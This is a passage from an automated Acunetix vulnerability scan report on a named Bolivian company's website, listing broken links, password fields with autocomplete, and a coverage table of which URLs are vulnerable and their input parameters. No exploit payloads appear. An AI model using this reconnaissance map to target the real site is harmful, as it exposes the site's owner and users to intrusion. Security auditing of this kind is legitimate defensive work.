For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /common/css/minilistasfcl.css HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/common/css/spritefcl.css
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /common/css/spritefcl.css HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
20Acunetix Website Audit
-
Details/common/css/spritefcl_class.css
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /common/css/spritefcl_class.css HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/listado_empresas.php
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /listado_empresas.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/www.facebook.com/BarracaCerroAzul
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >select Referrers Tab from the bottom of the Information pane.GET /www.facebook.com/BarracaCerroAzul HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
21Acunetix Website Audit
-
Password type input with auto-complete enabledInformationalSeverityInformationalTypeCrawlerReported by module
Impact
DescriptionWhen a new name and password is entered in a form and the form is submitted, the browser asks if the passwordshould be saved. Thereafter when the form is displayed, the name and password are filled in automatically or arecompleted as the name is entered. An attacker with local access could obtain the cleartext password from the browsercache.
Possible sensitive information disclosureRecommendationThe password auto-complete should be disabled in sensitive applications. To disable auto-complete, you may use a code similar to:
Affected items
Details/empresa.php
Password type input named password from form with ID form-homepage-contact with action empresa.php hasautocomplete enabled.GET /empresa.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/sesion.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/listado.php
Password type input named password from form with ID form-homepage-contact with action listado.php hasautocomplete enabled.GET /listado.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/contacto.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Request headers
22Acunetix Website Audit
-
Chrome/28.0.1500.63 Safari/537.36Accept: */*
Details/privacidad.php
Password type input named password from form with ID form-homepage-contact with action privacidad.php hasautocomplete enabled.GET /privacidad.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/sesion.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/sesion.php
Password type input named password from form with ID form-homepage-contact with action sesion.php hasautocomplete enabled.GET /sesion.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
Details/suscribirse.php
Password type input named password from form with ID form-homepage-contact with action suscribirse.php hasautocomplete enabled.GET /suscribirse.php HTTP/1.1Pragma: no-cacheCache-Control: no-cacheReferer: http://www.cerroazul.com.bo/common.phpAcunetix-Aspect: enabledAcunetix-Aspect-Password: *****Acunetix-Aspect-Queries: filelist;aspectalertsCookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709dHost: www.cerroazul.com.boConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/28.0.1500.63 Safari/537.36Accept: */*
Request headers
23Acunetix Website Audit
-
Scanned items (coverage report)Scanned 126 URLs. Found 22 vulnerable.
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common.php
4 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GETInput scheme 2Input name Input typemensaje URL encoded GETname URL encoded GETphone URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/listado_empresas.php
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/mapa.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/sesion.php
6 input(s) found for this URLInputsInput scheme 1Input name Input typepassword URL encoded POSTphone URL encoded POSTInput scheme 2Input name Input typephone URL encoded POSTInput scheme 3Input name Input typepassword URL encoded POSTphone URL encoded POSTusuario URL encoded POST
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/about.php
1 input(s) found for this URLInputs
24Acunetix Website Audit
-
Input scheme 1Input name Input typeid URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/index.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/contacto.php
5 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GETInput scheme 2Input name Input typecorreo URL encoded GETmensaje URL encoded GETname URL encoded GETphone URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/comentario.php
3 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GETInput scheme 2Input name Input typecomentario URL encoded GETname URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/reset.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/boton.css
No input(s) found for this URL
25Acunetix Website Audit
-
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/styles.css
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/menuUni.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/basefcl.css
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/spritefcl.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/base_header.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/nivo-slider.css
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/minilistasfcl.css
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/spritefcl_class.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/accordionmenu.css
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/minilistas_fcl.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/gallery_bottom/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/gallery_bottom/style.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/gallery_bottom/settings.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/gallery_bottom/css-family.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/menuuni.css
No input(s) found for this URL
26Acunetix Website Audit
-
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/style2.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/menuicon.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/catalogo.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/listas_fcl.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/img
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/basic.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/galleriffic-3.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/menu_acor.css
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/css/ie-css3.htc
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/empresas/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/uploads/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/thumb/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/banners/
No input(s) found for this URL
27Acunetix Website Audit
-
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/images_menu/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/gallery_bottom/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/images/site
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/accordionmenu.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/jquery.min.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/cargar_index.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/banner/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.pack.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.easing.1.3.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.cssAnimate.mini.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.touchwipe.min.js
No input(s) found for this URL
28Acunetix Website Audit
-
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.mousewheel.min.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.themepunch.services.min.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/mapa.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/gmaps.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/login.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/jquery.md5.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/cargar_contacto.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/comentario.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/cargar_cata.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/parametros.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/registrarse.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/jquery.history.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/jquery.galleriffic.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/jquery.opacityrollover.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/cargar_descripcion.js
No input(s) found for this URL
29Acunetix Website Audit
-
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/actualizar_visita_cata.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/cargar_grupo.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/buscar.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/ubicaciones.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/js/search.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/themes/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/themes/base/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.all.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.theme.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.autocomplete.css
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/jquery-1.4.2.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/ui/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.core.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.widget.js
No input(s) found for this URL
30Acunetix Website Audit
-
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.position.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.autocomplete.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.min.js
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/site
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/site/common
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/imagenes
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/layout_miarroba
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/layout_miarroba/sprites
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/empresa/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/empresa/get_empresas.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typeid_dpto URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/search/
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/search/get-datos.php
2 input(s) found for this URLInputs
31Acunetix Website Audit
-
Input scheme 1Input name Input typeid_dpto URL encoded GETparametro URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/search/get_paginador2.php
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/search/get_datespag2.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typevf_param URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/catalogo/
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/catalogo/get_datos_descripcion.php
2 input(s) found for this URLInputsInput scheme 1Input name Input typeid_cata URL encoded GETid_empre URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/catalogo/actualizar_cata.php
2 input(s) found for this URLInputsInput scheme 1Input name Input typeid_cata URL encoded GETid_empre URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/contacto/
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/contacto/get-datos.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typeid_empre URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/contacto/enviar_datos.php
5 input(s) found for this URLInputs
32Acunetix Website Audit
-
Input scheme 1Input name Input typecorreo URL encoded GETid_empre URL encoded GETmensaje URL encoded GETnombre URL encoded GETtelefono URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/comentario/
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/comentario/get_datos.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typeid_empre URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/comentario/get-paginador.php
No input(s) found for this URL
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/comentario/get-datespag.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typevf_param URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/common/php/comentario/insertar_come.php
4 input(s) found for this URLInputsInput scheme 1Input name Input typedescripcion URL encoded GETid_empre URL encoded GETid_padre URL encoded GETnombre URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/catalogo.php
1 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/suscribirse.php
6 input(s) found for this URLInputs
33Acunetix Website Audit
-
Input scheme 1Input name Input typepassword URL encoded POSTtxt_usuario URL encoded POSTInput scheme 2Input name Input typename URL encoded POSTpassword URL encoded POSTphone URL encoded POSTtxt_nombre URL encoded POST
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/descripcion.php
2 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GETid_cata URL encoded GET
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/catalogo_grupo.php
3 input(s) found for this URLInputsInput scheme 1Input name Input typeid URL encoded GETid_fami URL encoded GETid_grupo URL encoded GET
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/www.facebook.com
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/www.facebook.com/BarracaCerroAzul
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/empresa.php
2 input(s) found for this URLInputsInput scheme 1Input name Input typepassword URL encoded POSTtxt_usuario URL encoded POST
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/ubicacion.php
No input(s) found for this URL
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/privacidad.php
2 input(s) found for this URLInputs
34Acunetix Website Audit
-
Input scheme 1Input name Input typepassword URL encoded POSTtxt_usuario URL encoded POST
Vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/listado.php
2 input(s) found for this URLInputsInput scheme 1Input name Input typepassword URL encoded POSTtxt_nombre URL encoded POST
No vulnerabilities has been identified for this URLURL: http://www.cerroazul.com.bo/undefined
No input(s) found for this URL
35Acunetix Website Audit